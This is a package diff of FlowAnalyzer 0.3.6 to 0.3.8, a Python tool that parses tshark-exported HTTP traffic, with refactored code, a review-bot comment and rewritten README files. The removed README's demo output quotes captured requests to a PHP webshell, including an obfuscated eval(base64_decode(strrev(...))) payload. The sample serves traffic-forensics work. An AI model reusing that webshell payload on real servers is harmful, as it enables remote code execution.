FlowAnalyzer 0.3.6__tar.gz → 0.3.8__tar.gz

@@ -36,15 +36,15 @@ class HttpPair(NamedTuple):
36
36
  class FlowAnalyzer:
37
37
  """FlowAnalyzer是一个流量分析器,用于解析和处理tshark导出的JSON数据文件"""
38
38
 
39
- def __init__(self, jsonPath: str):
39
+ def __init__(self, json_path: str):
40
40
  """初始化FlowAnalyzer对象
41
41
 
42
42
  Parameters
43
43
  ----------
44
- jsonPath : str
44
+ json_path : str
45
45
  tshark导出的JSON文件路径
46
46
  """
47
- self.jsonPath = jsonPath
47
+ self.json_path = json_path
48
48
  self.check_json_file()
49
49
 
50
50
  def check_json_file(self):
@@ -58,11 +58,11 @@ class FlowAnalyzer:
58
58
  ValueError
59
59
  当JSON文件内容为空时抛出异常
60
60
  """
61
- if not os.path.exists(self.jsonPath):
62
- raise FileNotFoundError("您的tshark导出的JSON文件没有找到!JSON路径:%s" % self.jsonPath)
61
+ if not os.path.exists(self.json_path):
62
+ raise FileNotFoundError("您的tshark导出的JSON文件没有找到!JSON路径:%s" % self.json_path)
63
63
 
64
- if os.path.getsize(self.jsonPath) == 0:
65
- raise ValueError("您的tshark导出的JSON文件内容为空!JSON路径:%s" % self.jsonPath)
64
+ if os.path.getsize(self.json_path) == 0:
65
+ raise ValueError("您的tshark导出的JSON文件内容为空!JSON路径:%s" % self.json_path)
66
66
 
67
67
  def parse_packet(self, packet: dict) -> Tuple[int, int, float, str, str]:
68
68
  """解析Json中的关键信息字段
@@ -92,7 +92,6 @@ class FlowAnalyzer:
92
92
  return frame_num, request_in, time_epoch, full_uri, full_request
93
93
 
94
94
  def parse_http_json(self) -> Tuple[Dict[int, Request], Dict[int, Response]]:
95
- # sourcery skip: use-named-expression
96
95
  """解析JSON数据文件中的HTTP请求和响应信息
97
96
 
98
97
  Returns
@@ -100,7 +99,7 @@ class FlowAnalyzer:
100
99
  tuple
101
100
  包含请求字典和响应列表的元组
102
101
  """
103
- with open(self.jsonPath, "r", encoding="utf-8") as f:
102
+ with open(self.json_path, "r", encoding="utf-8") as f:
104
103
  data = json.load(f)
105
104
 
106
105
  requests, responses = {}, {}
@@ -110,7 +109,7 @@ class FlowAnalyzer:
110
109
  header, file_data = self.extract_http_file_data(full_request)
111
110
 
112
111
  # 请求包使用 full_uri 来记录请求 url 返回包使用 request_in 来记录请求包的序号
113
- if packet.get("http.response_number"):
112
+ if packet.get("http.response.code"):
114
113
  responses[frame_num] = Response(
115
114
  frame_num=frame_num,
116
115
  request_in=request_in,
@@ -149,20 +148,18 @@ class FlowAnalyzer:
149
148
  yield HttpPair(request=None, response=resp)
150
149
 
151
150
  @staticmethod
152
- def get_hash(filePath: str, display_filter: str) -> str:
153
- with open(filePath, "rb") as f:
151
+ def get_hash(file_path: str, display_filter: str) -> str:
152
+ with open(file_path, "rb") as f:
154
153
  return hashlib.md5(f.read() + display_filter.encode()).hexdigest()
155
154
 
156
155
  @staticmethod
157
- def extract_json_file(fileName: str, display_filter: str, tshark_workDir: str, tshark_path: str) -> None:
158
- # sourcery skip: replace-interpolation-with-fstring, use-fstring-for-formatting
156
+ def extract_json_file(file_name: str, display_filter: str, tshark_work_dir: str, tshark_path: str) -> None:
159
157
  command = [
160
158
  tshark_path,
161
- "-r", fileName,
162
- "-Y", f"(tcp.reassembled_in) or ({display_filter})",
159
+ "-r", file_name,
160
+ "-Y", f"({display_filter})",
163
161
  "-T", "json",
164
- "-e", "http.request_number",
165
- "-e", "http.response_number",
162
+ "-e", "http.response.code",
166
163
  "-e", "http.request_in",
167
164
  "-e", "tcp.reassembled.data",
168
165
  "-e", "frame.number",
@@ -170,33 +167,43 @@ class FlowAnalyzer:
170
167
  "-e", "frame.time_epoch",
171
168
  "-e", "exported_pdu.exported_pdu",
172
169
  "-e", "http.request.full_uri",
173
- ">", "output.json",
174
170
  ]
175
171
 
176
- _, stderr = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=tshark_workDir).communicate()
177
- if stderr != b"" and b"WARNING" not in stderr:
178
- print(f"[Waring/Error]: {stderr}")
172
+ with open(f"{tshark_work_dir}/output.json", "wb") as output_file:
173
+ process = subprocess.Popen(
174
+ command,
175
+ stdout=output_file,
176
+ stderr=subprocess.PIPE,
177
+ cwd=tshark_work_dir
178
+ )
179
+ _, stderr = process.communicate()
180
+
181
+ if stderr and b"WARNING" not in stderr:
182
+ try:
183
+ print(f"[Warning/Error]: {stderr.decode('utf-8')}")
184
+ except Exception:
185
+ print(f"[Warning/Error]: {stderr.decode('gbk')}")
179
186
 
180
187
  @staticmethod
181
- def move_and_addMD5Sum(tshark_jsonPath: str, jsonWordPath: str, MD5Sum: str) -> None:
182
- if tshark_jsonPath != jsonWordPath:
183
- shutil.move(tshark_jsonPath, jsonWordPath)
188
+ def move_and_add_md5sum(tshark_json_path: str, json_work_path: str, md5_sum: str) -> None:
189
+ if tshark_json_path != json_work_path:
190
+ shutil.move(tshark_json_path, json_work_path)
184
191
 
185
- with open(jsonWordPath, "r", encoding="utf-8") as f:
192
+ with open(json_work_path, "r", encoding="utf-8") as f:
186
193
  data = json.load(f)
187
- data[0]["MD5Sum"] = MD5Sum
194
+ data[0]["MD5Sum"] = md5_sum
188
195
 
189
- with open(jsonWordPath, "w", encoding="utf-8") as f:
196
+ with open(json_work_path, "w", encoding="utf-8") as f:
190
197
  json.dump(data, f, indent=2)
191
198
 
192
199
  @staticmethod
193
- def get_json_data(filePath: str, display_filter: str, tshark_path: Optional[str] = None) -> str:
200
+ def get_json_data(file_path: str, display_filter: str, tshark_path: Optional[str] = None) -> str:
194
201
  # sourcery skip: replace-interpolation-with-fstring
195
202
  """获取JSON数据并保存至文件,保存目录是当前工作目录,也就是您运行脚本所在目录
196
203
 
197
204
  Parameters
198
205
  ----------
199
- filePath : str
206
+ file_path : str
200
207
  待处理的数据文件路径
201
208
  display_filter : str
202
209
  WireShark的显示过滤器
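Review bot: The exit status of tshark is never checked after `process.communicate()`, and the stderr test prints nothing whenever the bytes `WARNING` appear anywhere in the output, so a real failure that comes with a warning passes silently. Because `output.json` is opened with `"wb"` before tshark runs, a failed run leaves an empty or partial file that `move_and_add_md5sum` then hands to `json.load`, and the caller sees a JSON error instead of the tshark message. I would add `if process.returncode != 0: raise RuntimeError(stderr.decode("utf-8", errors="replace"))` after the `with` block and decode the warning path the same way, which also removes the `except Exception` fallback to `gbk` (that second decode can itself raise). The output path is built as `f"{tshark_work_dir}/output.json"` while `get_json_data` uses `os.path.join(tshark_work_dir, "output.json")`; using one form in both places keeps the two from drifting apart. The start of `extract_json_file` is in the previous hunk.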
@@ -206,30 +213,30 @@ class FlowAnalyzer:
206
213
  str
207
214
  保存JSON数据的文件路径
208
215
  """
209
- if not os.path.exists(filePath):
210
- raise FileNotFoundError("您的填写的流量包没有找到!流量包路径:%s" % filePath)
216
+ if not os.path.exists(file_path):
217
+ raise FileNotFoundError("您的填写的流量包没有找到!流量包路径:%s" % file_path)
211
218
 
212
- MD5Sum = FlowAnalyzer.get_hash(filePath, display_filter)
213
- workDir = os.getcwd()
214
- tshark_workDir = os.path.dirname(os.path.abspath(filePath))
215
- tshark_jsonPath = os.path.join(tshark_workDir, "output.json")
216
- jsonWordPath = os.path.join(workDir, "output.json")
217
- fileName = os.path.basename(filePath)
219
+ md5_sum = FlowAnalyzer.get_hash(file_path, display_filter)
220
+ work_dir = os.getcwd()
221
+ tshark_work_dir = os.path.dirname(os.path.abspath(file_path))
222
+ tshark_json_path = os.path.join(tshark_work_dir, "output.json")
223
+ json_work_path = os.path.join(work_dir, "output.json")
224
+ file_name = os.path.basename(file_path)
218
225
 
219
- if os.path.exists(jsonWordPath):
226
+ if os.path.exists(json_work_path):
220
227
  try:
221
- with open(jsonWordPath, "r", encoding="utf-8") as f:
228
+ with open(json_work_path, "r", encoding="utf-8") as f:
222
229
  data = json.load(f)
223
- if data[0].get("MD5Sum") == MD5Sum:
230
+ if data[0].get("MD5Sum") == md5_sum:
224
231
  logger.debug("匹配HASH校验无误,自动返回Json文件路径!")
225
- return jsonWordPath
232
+ return json_work_path
226
233
  except Exception:
227
- logger.debug("默认的Json文件无法被正常解析, 正在重新生成josn文件中")
234
+ logger.debug("默认的Json文件无法被正常解析, 正在重新生成Json文件中")
228
235
 
229
236
  tshark_path = FlowAnalyzer.get_tshark_path(tshark_path)
230
- FlowAnalyzer.extract_json_file(fileName, display_filter, tshark_workDir, tshark_path)
231
- FlowAnalyzer.move_and_addMD5Sum(tshark_jsonPath, jsonWordPath, MD5Sum)
232
- return jsonWordPath
237
+ FlowAnalyzer.extract_json_file(file_name, display_filter, tshark_work_dir, tshark_path)
238
+ FlowAnalyzer.move_and_add_md5sum(tshark_json_path, json_work_path, md5_sum)
239
+ return json_work_path
233
240
 
234
241
  @staticmethod
235
242
  def get_tshark_path(tshark_path: Optional[str]) -> str:
@@ -254,8 +261,7 @@ class FlowAnalyzer:
254
261
  exit(-1)
255
262
  return use_tshark_path
256
263
 
257
- def Split_HTTP_headers(self, file_data: bytes) -> Tuple[bytes, bytes]:
258
- # sourcery skip: use-named-expression
264
+ def split_http_headers(self, file_data: bytes) -> Tuple[bytes, bytes]:
259
265
  headerEnd = file_data.find(b"\r\n\r\n")
260
266
  if headerEnd != -1:
261
267
  headerEnd += 4
@@ -267,7 +273,7 @@ class FlowAnalyzer:
267
273
  print("[Warning] 没有找到headers和response的划分位置!")
268
274
  return b"", file_data
269
275
 
270
- def Dechunck_HTTP_response(self, file_data: bytes) -> bytes:
276
+ def dechunck_http_response(self, file_data: bytes) -> bytes:
271
277
  """解码分块TCP数据
272
278
 
273
279
  Parameters
@@ -307,10 +313,10 @@ class FlowAnalyzer:
307
313
  tuple
308
314
  包含header和file_data的元组
309
315
  """
310
- header, file_data = self.Split_HTTP_headers(bytes.fromhex(full_request))
316
+ header, file_data = self.split_http_headers(bytes.fromhex(full_request))
311
317
 
312
318
  with contextlib.suppress(Exception):
313
- file_data = self.Dechunck_HTTP_response(file_data)
319
+ file_data = self.dechunck_http_response(file_data)
314
320
 
315
321
  with contextlib.suppress(Exception):
316
322
  if file_data.startswith(b"\x1F\x8B"):
@@ -0,0 +1,71 @@
1
+ Metadata-Version: 2.1
2
+ Name: FlowAnalyzer
3
+ Version: 0.3.8
4
+ Summary: FlowAnalyzer是一个流量分析器,用于解析和处理tshark导出的JSON数据文件
5
+ Home-page: https://github.com/Byxs20/FlowAnalyzer
6
+ Author: Byxs20
7
+ Author-email: 97766819@qq.com
8
+ Classifier: Development Status :: 3 - Alpha
9
+ Classifier: Intended Audience :: Developers
10
+ Classifier: License :: OSI Approved :: MIT License
11
+ Classifier: Programming Language :: Python :: 3
12
+ Classifier: Programming Language :: Python :: 3.6
13
+ Classifier: Programming Language :: Python :: 3.7
14
+ Classifier: Programming Language :: Python :: 3.8
15
+ Classifier: Programming Language :: Python :: 3.9
16
+ Description-Content-Type: text/markdown
17
+ License-File: LICENSE
18
+
19
+ # FlowAnalyzer
20
+
21
+ # 安装
22
+
23
+ 使用 `pip` 安装:
24
+
25
+ ```
26
+ pip3 install FlowAnalyzer
27
+ ```
28
+
29
+ ```
30
+ pip3 install FlowAnalyzer -i https://pypi.org/simple
31
+ ```
32
+
33
+ # 快速上手
34
+
35
+ ## 配置
36
+
37
+ 如果您安装 `WireShark` 没有修改安装目录,默认 `tshark` 路径会如下:
38
+
39
+ ```python
40
+ # windows
41
+ tshark_path = r"C:\Program Files\Wireshark\tshark.exe"
42
+ ```
43
+
44
+ `Linux`, `MacOS` 默认路径不清楚,需要看下面的**纠正路径**,**确定路径没有问题,那也无需任何配置即可使用!**
45
+
46
+ ## 纠正路径
47
+
48
+ 修改 `python安装目录\Lib\site-packages\FlowAnalyzer\Path.py` 中的变量 `tshark_path` 改为**tshark正确路径**
49
+
50
+ ## 测试
51
+
52
+ ```
53
+ $ git clone https://github.com/Byxs20/FlowAnalyzer.git
54
+ $ cd ./FlowAnalyzer/
55
+ $ python -m tests.demo
56
+ ```
57
+
58
+ 运行结果:
59
+
60
+ ```
61
+ [+] 正在处理第1个HTTP流!
62
+ 序号: 2请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\n
63
+ ...
64
+ ```
65
+
66
+ # Contributing
67
+ Feel free to submit issues or pull requests if you have any suggestions, improvements, or bug reports.
68
+
69
+ # License
70
+
71
+ This project is licensed under the [MIT License.](LICENSE)
@@ -0,0 +1,71 @@
1
+ Metadata-Version: 2.1
2
+ Name: FlowAnalyzer
3
+ Version: 0.3.8
4
+ Summary: FlowAnalyzer是一个流量分析器,用于解析和处理tshark导出的JSON数据文件
5
+ Home-page: https://github.com/Byxs20/FlowAnalyzer
6
+ Author: Byxs20
7
+ Author-email: 97766819@qq.com
8
+ Classifier: Development Status :: 3 - Alpha
9
+ Classifier: Intended Audience :: Developers
10
+ Classifier: License :: OSI Approved :: MIT License
11
+ Classifier: Programming Language :: Python :: 3
12
+ Classifier: Programming Language :: Python :: 3.6
13
+ Classifier: Programming Language :: Python :: 3.7
14
+ Classifier: Programming Language :: Python :: 3.8
15
+ Classifier: Programming Language :: Python :: 3.9
16
+ Description-Content-Type: text/markdown
17
+ License-File: LICENSE
18
+
19
+ # FlowAnalyzer
20
+
21
+ # 安装
22
+
23
+ 使用 `pip` 安装:
24
+
25
+ ```
26
+ pip3 install FlowAnalyzer
27
+ ```
28
+
29
+ ```
30
+ pip3 install FlowAnalyzer -i https://pypi.org/simple
31
+ ```
32
+
33
+ # 快速上手
34
+
35
+ ## 配置
36
+
37
+ 如果您安装 `WireShark` 没有修改安装目录,默认 `tshark` 路径会如下:
38
+
39
+ ```python
40
+ # windows
41
+ tshark_path = r"C:\Program Files\Wireshark\tshark.exe"
42
+ ```
43
+
44
+ `Linux`, `MacOS` 默认路径不清楚,需要看下面的**纠正路径**,**确定路径没有问题,那也无需任何配置即可使用!**
45
+
46
+ ## 纠正路径
47
+
48
+ 修改 `python安装目录\Lib\site-packages\FlowAnalyzer\Path.py` 中的变量 `tshark_path` 改为**tshark正确路径**
49
+
50
+ ## 测试
51
+
52
+ ```
53
+ $ git clone https://github.com/Byxs20/FlowAnalyzer.git
54
+ $ cd ./FlowAnalyzer/
55
+ $ python -m tests.demo
56
+ ```
57
+
58
+ 运行结果:
59
+
60
+ ```
61
+ [+] 正在处理第1个HTTP流!
62
+ 序号: 2请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\n
63
+ ...
64
+ ```
65
+
66
+ # Contributing
67
+ Feel free to submit issues or pull requests if you have any suggestions, improvements, or bug reports.
68
+
69
+ # License
70
+
71
+ This project is licensed under the [MIT License.](LICENSE)
@@ -0,0 +1,53 @@
1
+ # FlowAnalyzer
2
+
3
+ # 安装
4
+
5
+ 使用 `pip` 安装:
6
+
7
+ ```
8
+ pip3 install FlowAnalyzer
9
+ ```
10
+
11
+ ```
12
+ pip3 install FlowAnalyzer -i https://pypi.org/simple
13
+ ```
14
+
15
+ # 快速上手
16
+
17
+ ## 配置
18
+
19
+ 如果您安装 `WireShark` 没有修改安装目录,默认 `tshark` 路径会如下:
20
+
21
+ ```python
22
+ # windows
23
+ tshark_path = r"C:\Program Files\Wireshark\tshark.exe"
24
+ ```
25
+
26
+ `Linux`, `MacOS` 默认路径不清楚,需要看下面的**纠正路径**,**确定路径没有问题,那也无需任何配置即可使用!**
27
+
28
+ ## 纠正路径
29
+
30
+ 修改 `python安装目录\Lib\site-packages\FlowAnalyzer\Path.py` 中的变量 `tshark_path` 改为**tshark正确路径**
31
+
32
+ ## 测试
33
+
34
+ ```
35
+ $ git clone https://github.com/Byxs20/FlowAnalyzer.git
36
+ $ cd ./FlowAnalyzer/
37
+ $ python -m tests.demo
38
+ ```
39
+
40
+ 运行结果:
41
+
42
+ ```
43
+ [+] 正在处理第1个HTTP流!
44
+ 序号: 2请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\n
45
+ ...
46
+ ```
47
+
48
+ # Contributing
49
+ Feel free to submit issues or pull requests if you have any suggestions, improvements, or bug reports.
50
+
51
+ # License
52
+
53
+ This project is licensed under the [MIT License.](LICENSE)
@@ -7,7 +7,7 @@ with open(os.path.join(os.path.dirname(__file__), "README.md"), encoding="utf-8"
7
7
 
8
8
  setup(
9
9
  name="FlowAnalyzer",
10
- version="0.3.6",
10
+ version="0.3.8",
11
11
  description="FlowAnalyzer是一个流量分析器,用于解析和处理tshark导出的JSON数据文件",
12
12
  author="Byxs20",
13
13
  author_email="97766819@qq.com",
@@ -1,94 +0,0 @@
1
- Metadata-Version: 2.1
2
- Name: FlowAnalyzer
3
- Version: 0.3.6
4
- Summary: FlowAnalyzer是一个流量分析器,用于解析和处理tshark导出的JSON数据文件
5
- Home-page: https://github.com/Byxs20/FlowAnalyzer
6
- Author: Byxs20
7
- Author-email: 97766819@qq.com
8
- Classifier: Development Status :: 3 - Alpha
9
- Classifier: Intended Audience :: Developers
10
- Classifier: License :: OSI Approved :: MIT License
11
- Classifier: Programming Language :: Python :: 3
12
- Classifier: Programming Language :: Python :: 3.6
13
- Classifier: Programming Language :: Python :: 3.7
14
- Classifier: Programming Language :: Python :: 3.8
15
- Classifier: Programming Language :: Python :: 3.9
16
- Description-Content-Type: text/markdown
17
- License-File: LICENSE
18
-
19
- # FlowAnalyzer
20
-
21
- # 安装
22
-
23
- 使用 `pip` 安装:
24
-
25
- ```
26
- pip3 install FlowAnalyzer
27
- ```
28
-
29
- ```
30
- pip3 install FlowAnalyzer -i https://pypi.org/simple
31
- ```
32
-
33
- # 快速上手
34
-
35
- 如果您安装 `WireShark` 没有修改安装目录,默认 `tshark` 路径会如下:
36
-
37
- ```python
38
- # windows
39
- tshark_path = r"C:\Program Files\Wireshark\tshark.exe"
40
- ```
41
-
42
- 您确定路径没有问题,那也无需任何配置即可使用!
43
-
44
- 否则,您需要修改 `python安装目录\Lib\site- packages\FlowAnalyzer\Path.py` 中的变量 `tshark_path` 改为您的安装目录
45
-
46
- ```
47
- $ git clone https://github.com/Byxs20/FlowAnalyzer.git
48
- $ cd ./FlowAnalyzer/
49
- ```
50
-
51
- 使用 `python3 .\tests\demo.py` 看是否能输出正确的运行结果,测试代码如下:
52
-
53
- ```python
54
- # sourcery skip: use-fstring-for-formatting
55
- import os
56
- from FlowAnalyzer import FlowAnalyzer
57
-
58
-
59
- baseDir = os.path.dirname(os.path.abspath(__file__))
60
- flowPath = os.path.join(baseDir, "flow.pcapng")
61
- display_filter = "(http.request and urlencoded-form) or (http.request and data-text-lines) or (http.request and mime_multipart) or (http.response.code == 200 and data-text-lines)"
62
-
63
- jsonPath = FlowAnalyzer.get_json_data(flowPath, display_filter=display_filter)
64
- for count, http in enumerate(FlowAnalyzer(jsonPath).generate_http_dict_pairs(), start=1):
65
- print(f"[+] 正在处理第{count}个HTTP流!")
66
-
67
- request, response = http.request, http.response
68
- if request:
69
- request_num, header, file_data, time_epoch = request.frame_num, request.header, request.file_data, request.time_epoch
70
- print("序号: {}请求包, 请求头: {}, 文件: {}, 时间: {}".format(request_num, header, file_data, time_epoch))
71
-
72
- if response:
73
- response_num, header, file_data, time_epoch = response.frame_num, response.header, response.file_data, response.time_epoch
74
- print("序号: {}请求包, 请求头: {}, 文件: {}, 时间: {}".format(response_num, header, file_data, time_epoch))
75
- ```
76
-
77
- 运行结果:
78
-
79
- ```
80
- [+] 正在处理第1个HTTP流!
81
- 序号: 2请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1403', 文件: b'pass=eval%28base64_decode%28strrev%28urldecode%28%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%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTF1YCWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPnQDdprPQMrHPVjA6hjPeOQNpHlpcBNa5IHIHHrIHEy7jch%2Fv3Z2Y0lq8qSQQkYhwWZhxVpNq1liOGE%3D', 时间: 1682596262.982344
82
- 序号: 3请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:02 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'70\r\n72a9c691ccdaab98fL1tMGI4YTljMh76GrwuHij67J+qF+t2KR17BwHlSvtL1mdSPnoksIZRS0N0Xi89+zNlNaUo+3xjMTU=b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596262.992406
83
- [+] 正在处理第2个HTTP流!
84
- 序号: 5请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1409', 文件: b'pass=eval%28base64_decode%28strrev%28urldecode%28%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%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTF1cCWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPnQDdprPQMrHPVjA6hjPeOTReMrqj%2Fx6aH4XU%2BWInBcrzUhN6o%2FMfL54MmpIY6avwUcSIJBkZUuq7rVUYzE1', 时间: 1682596266.652869
85
- 序号: 6请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:06 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'40\r\n72a9c691ccdaab98fL1tMGI4YTljMh4dHdNjM6AJ3DZmOGE5b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596266.661427
86
- ...
87
- ```
88
-
89
- # Contributing
90
- Feel free to submit issues or pull requests if you have any suggestions, improvements, or bug reports.
91
-
92
- # License
93
-
94
- This project is licensed under the [MIT License.](LICENSE)
@@ -1,94 +0,0 @@
1
- Metadata-Version: 2.1
2
- Name: FlowAnalyzer
3
- Version: 0.3.6
4
- Summary: FlowAnalyzer是一个流量分析器,用于解析和处理tshark导出的JSON数据文件
5
- Home-page: https://github.com/Byxs20/FlowAnalyzer
6
- Author: Byxs20
7
- Author-email: 97766819@qq.com
8
- Classifier: Development Status :: 3 - Alpha
9
- Classifier: Intended Audience :: Developers
10
- Classifier: License :: OSI Approved :: MIT License
11
- Classifier: Programming Language :: Python :: 3
12
- Classifier: Programming Language :: Python :: 3.6
13
- Classifier: Programming Language :: Python :: 3.7
14
- Classifier: Programming Language :: Python :: 3.8
15
- Classifier: Programming Language :: Python :: 3.9
16
- Description-Content-Type: text/markdown
17
- License-File: LICENSE
18
-
19
- # FlowAnalyzer
20
-
21
- # 安装
22
-
23
- 使用 `pip` 安装:
24
-
25
- ```
26
- pip3 install FlowAnalyzer
27
- ```
28
-
29
- ```
30
- pip3 install FlowAnalyzer -i https://pypi.org/simple
31
- ```
32
-
33
- # 快速上手
34
-
35
- 如果您安装 `WireShark` 没有修改安装目录,默认 `tshark` 路径会如下:
36
-
37
- ```python
38
- # windows
39
- tshark_path = r"C:\Program Files\Wireshark\tshark.exe"
40
- ```
41
-
42
- 您确定路径没有问题,那也无需任何配置即可使用!
43
-
44
- 否则,您需要修改 `python安装目录\Lib\site- packages\FlowAnalyzer\Path.py` 中的变量 `tshark_path` 改为您的安装目录
45
-
46
- ```
47
- $ git clone https://github.com/Byxs20/FlowAnalyzer.git
48
- $ cd ./FlowAnalyzer/
49
- ```
50
-
51
- 使用 `python3 .\tests\demo.py` 看是否能输出正确的运行结果,测试代码如下:
52
-
53
- ```python
54
- # sourcery skip: use-fstring-for-formatting
55
- import os
56
- from FlowAnalyzer import FlowAnalyzer
57
-
58
-
59
- baseDir = os.path.dirname(os.path.abspath(__file__))
60
- flowPath = os.path.join(baseDir, "flow.pcapng")
61
- display_filter = "(http.request and urlencoded-form) or (http.request and data-text-lines) or (http.request and mime_multipart) or (http.response.code == 200 and data-text-lines)"
62
-
63
- jsonPath = FlowAnalyzer.get_json_data(flowPath, display_filter=display_filter)
64
- for count, http in enumerate(FlowAnalyzer(jsonPath).generate_http_dict_pairs(), start=1):
65
- print(f"[+] 正在处理第{count}个HTTP流!")
66
-
67
- request, response = http.request, http.response
68
- if request:
69
- request_num, header, file_data, time_epoch = request.frame_num, request.header, request.file_data, request.time_epoch
70
- print("序号: {}请求包, 请求头: {}, 文件: {}, 时间: {}".format(request_num, header, file_data, time_epoch))
71
-
72
- if response:
73
- response_num, header, file_data, time_epoch = response.frame_num, response.header, response.file_data, response.time_epoch
74
- print("序号: {}请求包, 请求头: {}, 文件: {}, 时间: {}".format(response_num, header, file_data, time_epoch))
75
- ```
76
-
77
- 运行结果:
78
-
79
- ```
80
- [+] 正在处理第1个HTTP流!
81
- 序号: 2请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1403', 文件: b'pass=eval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTF1YCWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPn